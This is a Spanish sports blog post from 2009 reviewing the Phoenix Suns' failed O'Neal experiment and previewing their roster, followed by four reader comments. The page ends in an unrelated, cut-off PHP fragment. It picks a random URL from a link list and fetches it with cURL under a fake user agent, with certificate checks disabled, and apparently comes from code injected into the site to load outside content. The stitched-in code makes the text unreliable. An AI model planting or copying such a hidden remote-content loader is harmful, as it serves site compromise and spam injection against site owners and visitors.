Phoenix Suns: El tornado que asoló Arizona

23 de October de 2009 por TheDeerHunter

Cuando Twister” O’neal aterrizó en Phoenix, el equipo era virtual líder de la liga desplegando el juego más dinámico y espectacular de todo el lustro. 110 puntos anotados por noche que, desde la llegada del “mesías” Nash, los colocaba de forma indiscutible en la terna de máximos favoritos al título temporada tras temporada.

Las circunstancias en forma de Bowen, Duncan, Popovic y otros “duros huesos” tejanos les habían apartado ya de la gloria en demasiadas ocasiones. La confianza en el audaz modelo D’Antoni perdió fuerza con cada oportunidad perdida, aunque el nivel de juego no se perdiera en absoluto. Surgieron dudas sobre los puntos encajados, el ritmo de juego adecuado para playoffs, la implicación de algún elemento importante… y en eso los Lakers ficharon a Pau Gasol y todo el Oeste se puso patas arriba. Fue el momento para dar el volantazo hacia un ideario más conservador que muchos exigían.

No parecía un mal movimiento a priori. El “Big Cactus” que llegó de Miami ya no era el monstruo que arrasaba zonas en Orlando y L.A y tras ganar su cuarto anillo parecía haberse acomodado más de lo habitual en él mostrando evidentes signos de decadencia. Sin embargo, la sola idea de tener un juego interior formado por Stoudamire & Shaq con Nash nutriéndoles alegremente de balones podía poner espitoso al más pintado. Además, se sabía que Marion deseaba un cambio de aires. No podía ser tan difícil hacer funcionar aquello, con bajar un poco el ritmo de juego para no ahogar a Shaq y Nash podía ser suficiente…

Pero todo resultó un despropósito desde el principio y no precisamente por culpa del esperado bajo estado de forma del viejo perro grande. Los primeros problemas se achacaron a la falta de adaptación. Muchos partidos perdidos durante aquel tramo final. La consecuencia del fallido invento fue una primera ronda a cara de perro, la enésima, contra los Spurs. El caso es que durante el primer partido de aquella serie mostraron todo lo bueno que se pretendía en aquel traspaso: Dominio del juego interior y mayor control del juego. Sin embargo, Popovic no tardó en ajustar con Bowen mordiendo a Nash para convertir la zona en un cuello de botella donde los dos gigantes del equipo de Arizona se estorbaban. Un milagro en forma de triple ganador de Tim Duncan terminó de desmontar la paraeta. Las horas de D’Antoni en Phoenix estaban contadas y el sueño del anillo se volvió inalcanzable.

El nuevo coach Terry Porter trató de insistir en la idea con un ritmo de juego mucho más bajo que su predecesor. Simplemente ruinoso. Ni Nash ni Stat fueron capaces de adaptarse al sistema y el equipo perdió toda seña de identidad y de competitividad. Trataron de reactivarse fichando a Jason Richardson a cambio de Diaw y Bell pero casi fue peor el remedio que la enfermedad. Shaq, sin embargo, pareció rejuvenecer. MVP del All Star y jugando por momentos como en los mejores tiempos. Pero mientras, el equipo terminó de romperse, quedándose sin D’Antoni, sin “jogo bonito”, sin playoffs y sin Shaq que este verano se marchaba a intentar hacer campeón a LeBron. Al menos han logrado retener, casi de milagro, a Nash y Stoudamire y tuvo que llegar Alvin Gentry a recuperar las sensaciones de antaño. Mismo espíritu ofensivo, mismas dudas (o peores)… casi dos años más viejos y con peor plantilla.

Parece que el tren se les escapó definitivamente y es que ya nadie les considera favoritos. A lo sumo candidatos para la postemporada… y no necesariamente con plaza garantizada.

Es muy posible que Steve Nash jamás gane el anillo. Para olvidar penas, sin embargo, no está nada mal haber firmado, a los 35 añetes, una extensión bianual de su contrato por el módico montante de 22 millones de dólares, más los 13 que le quedan por cobrar. Seguirá durante ese tiempo llevando las riendas del run&gun como nadie ha sabido hacerlo. Habrá que ver cómo aguantan sus piernas hasta los 38 y si encuentran en Phoenix alguna manera de protegerle de las inclemencias de la regular, sin renunciar, eso sí, a las victorias que a buen seguro necesitarán. La clave serán los minutos que le permita descansar Goran Dragic, que gustó mucho contra España en el Europeo pero al que todavía le falta experiencia.

Leandrinho Barbosa también podría ayudar puntualmente por ese lado. Completa un buen perímetro puro junto a Jason Richardson, aunque no estaría de más que ambos dieran un paso adelante. Yo creo que se espera bastante más de ellos de lo que últimamente vienen ofreciendo.

De 3 continuará mandando el incombustible Grant Hill, quien tuvo la oportunidad de irse a buscar anillo a Boston durante el verano. 37 tacos que el hombre lleva con la máxima de las dignidades, pero en ningún caso es el joven desequilibrante que protagonizaba anuncios como hipotético heredero de Jordan. Jared Dudley, Alando Tucker y el 2ª ronda Taylor Griffin (que no Blake) completan una posición de alero tan numerosa como mediocre para quien pretende hacerlos pasar por candidatos.

Por dentro queda Amaré Stoudamire como bastión interior del equipo. Ya no será el mismo monstruo de antes de sus problemas físicos pero disfrutará de muchos más espacios y pronto renueva contrato. Es más que posible que abrirá junto a Channing Frye… o lo que es lo mismo, les van a caer chuzos de punta en defensa. Ya pueden rezar por una mejora significativa de gente como Robin Lopez, Louis Admundson o sobretodo del rookie de primera ronda, Earl Clark. Con esta batería de jugadores no nos extrañaría nada que se produzcan sorpresas en forma de movimientos a corto o medio plazo.

 

Quinteto titular: Nash, Richardson, Hill, Stoudamire, Frye
6º hombre:
Barbosa

Pronóstico: Fuera de Playoffs

Comenta

4 comentarios a esta entrada

  1. Txusma dice:
    #1

    La verdad es que creo que los Suns tenían que intentarlo. Quedó demostrado que el estilo D’Antoni no servía para Playoffs e hicieron el esfuerzo de cambiar buscando ese click que les permitiera aspirar de verdad al anillo. Con el paso de los años esos Suns estarán en ese grupo de equipos (como los Kings de Webber) de grandes equipos que nos hicieron disfrutar pero que nunca ganaron el anillo.
    Ahora les queda una situación complicada… y podria serlo más si Amare decide ser agente libre el verano siguiente.

      Citar

  2. sergio dice:
    #2

    Entonces Nash ya a renovado? y por dos años fijos? Pues no creia yo que un tipo con dos MVP’s de la regular se conformaria con eso y no buscaria una salida a un equipo con aspiraciones teniendo esos 35 añazos. Al menos hubiese estado bien esperar a las contrataciones el año que viene por parte de Phoenix para tomar decisiones… un equipo con Amare y Nash tiene mucho que decir para atraer gente… vamos, antes que a Minessota me iba yo xD

      Citar

  3. sergio dice:
    #3

    Por cierto, me encanta la segunda foto

      Citar

  4. Dantley2 dice:
    #4

    Otros que para mí no llegan a mucho. No sé, siempre he sospechado de Amare, más ruido que nueces. Frye parece que puede hacer estadísticas, pero no sé si ayudará a ganar partidos.

    La verdad es que es una pena que Nash se vaya a quedar sin anillo, pero bueno, recientemente comentó que es importante, pero que la carrera de un jugador no se mide por anillos. Supongo que Horry pensará otra cosa, pero no le falta buena parte de razón a Nash

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>